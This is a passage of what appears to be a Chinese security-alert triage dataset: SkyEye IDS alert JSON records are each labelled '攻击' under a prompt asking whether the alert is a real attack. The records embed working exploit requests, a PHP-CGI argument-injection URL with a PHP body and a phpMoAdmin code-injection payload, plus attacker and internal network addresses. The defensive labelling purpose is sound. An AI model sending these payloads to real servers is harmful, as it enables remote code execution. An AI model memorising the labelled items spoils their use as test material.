"/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "rsp_status": 0, "code_language": "其他", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": 27, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "public_date": "2018-11-14 00:00:00", "sport": 7736}, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/php.cgi", "first_access_time": "2024-11-27 00:07:47", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "20b63ab6d8069a480db22b24d32fe954", "xff": "", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "attack_chain": "0x02030000", "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637248", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "47", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10000bfa", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP CGI查询参数信息泄漏漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": "27", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b37c0bade0585bfeb7577540e6722ca8", "access_time": "2024-11-27 00:07:47", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438522-PHP CGI查询参数信息泄漏漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7736", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637267", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732637267, "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 5, "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dport": 80, "vuln_name": "发现脚本文件上传行为", "rsp_status": 0, "code_language": "通用", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": 0, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "public_date": "2018-08-20 18:32:27", "sport": 7736}, "detail_info": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "file_md5": "26bdeba127ea52f040c116037c5823a6", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/cgi-bin/{filename}", "first_access_time": "2024-11-27 00:07:47", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现脚本文件上传行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "d3fc6f33d63981c0412df0ae3b870109", "xff": "", "vuln_desc": "文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。", "attack_chain": "0x02010000", "vuln_harm": "攻击者通过文件上传获取一个webshell后,使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637248", "code_language": "通用", "public_date": "2018-08-20 18:32:27", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "5", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055e", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "发现脚本文件上传行为", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、文件上传的目录设置为不可执行权限\r\n2、判断文件类型,后缀名,内容等\r\n3、使用随机数改写文件名和文件路径", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9waHAuY2dpPyUyRCU2NCslNjElNkMlNkMlNkYlNzclNUYlNzUlNzIlNkMlNUYlNjklNkUlNjMlNkMlNzUlNjQlNjUlM0QlNkYlNkUrJTJEJTY0KyU3MyU2MSU2NiU2NSU1RiU2RCU2RiU2NCU2NSUzRCU2RiU2NiU2NislMkQlNjQrJTczJTc1JTY4JTZGJTczJTY5JTZFJTJFJTczJTY5JTZEJTc1JTZDJTYxJTc0JTY5JTZGJTZFJTNEJTZGJTZFKyUyRCU2NCslNjQlNjklNzMlNjElNjIlNkMlNjUlNUYlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlNzMlM0QlMjIlMjIrJTJEJTY0KyU2RiU3MCU2NSU2RSU1RiU2MiU2MSU3MyU2NSU2NCU2OSU3MiUzRCU2RSU2RiU2RSU2NSslMkQlNjQrJTYxJTc1JTc0JTZGJTVGJTcwJTcyJTY1JTcwJTY1JTZFJTY0JTVGJTY2JTY5JTZDJTY1JTNEJTcwJTY4JTcwJTNBJTJGJTJGJTY5JTZFJTcwJTc1JTc0KyUyRCU2NCslNjMlNjclNjklMkUlNjYlNkYlNzIlNjMlNjUlNUYlNzIlNjUlNjQlNjklNzIlNjUlNjMlNzQlM0QlMzArJTJEJTY0KyU2MyU2NyU2OSUyRSU3MiU2NSU2NCU2OSU3MiU2NSU2MyU3NCU1RiU3MyU3NCU2MSU3NCU3NSU3MyU1RiU2NSU2RSU3NiUzRCUzMCslMkQlNkUgSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LCovKjtxPTAuOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUsYnINCkNvbnRlbnQtTGVuZ3RoOiA0Mw0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LXBocC1jZ2ktcmNlJykpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c04f5e65fb1d1cf53fd14204f45f923e", "access_time": "2024-11-27 00:07:47", "content-length": "43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/cgi-bin/php.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php.cgi", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 43\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "<?php echo(md5('acunetix-php-cgi-rce')); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567902-发现脚本文件上传行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7736", "h_url": "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637265", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732637265, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 18, "uri": "/phpMoAdmin/moadmin.php", "dport": 80, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "124.239.114.146", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 7956}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "42909c1799407fc44eedf1135e4fe66c", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/phpMoAdmin/moadmin.php", "first_access_time": "2024-11-27 00:07:45", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "9e8e3179c8b9929be153ad67b16e888f", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637246", "code_language": "PHP", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "18", "h_proto_version": "HTTP/1.1", "uri": "/phpMoAdmin/moadmin.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvcGhwTW9BZG1pbi9tb2FkbWluLnBocCBIVFRQLzEuMQ0KQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KQ29udGVudC1MZW5ndGg6IDMxDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "b2JqZWN0PTE7cHJpbnQobWQ1KDMxMzM3KSk7ZXhpdA==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8c7b12c4c137f165cba0a1755c001c30", "access_time": "2024-11-27 00:07:45", "content-length": "31", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/phpMoAdmin/moadmin.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "moadmin.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /phpMoAdmin/moadmin.php HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 31\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "object=1;print(md5(31337));exit", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "sport": "7956", "h_url": "/phpMoAdmin/moadmin.php"} | 攻击 |
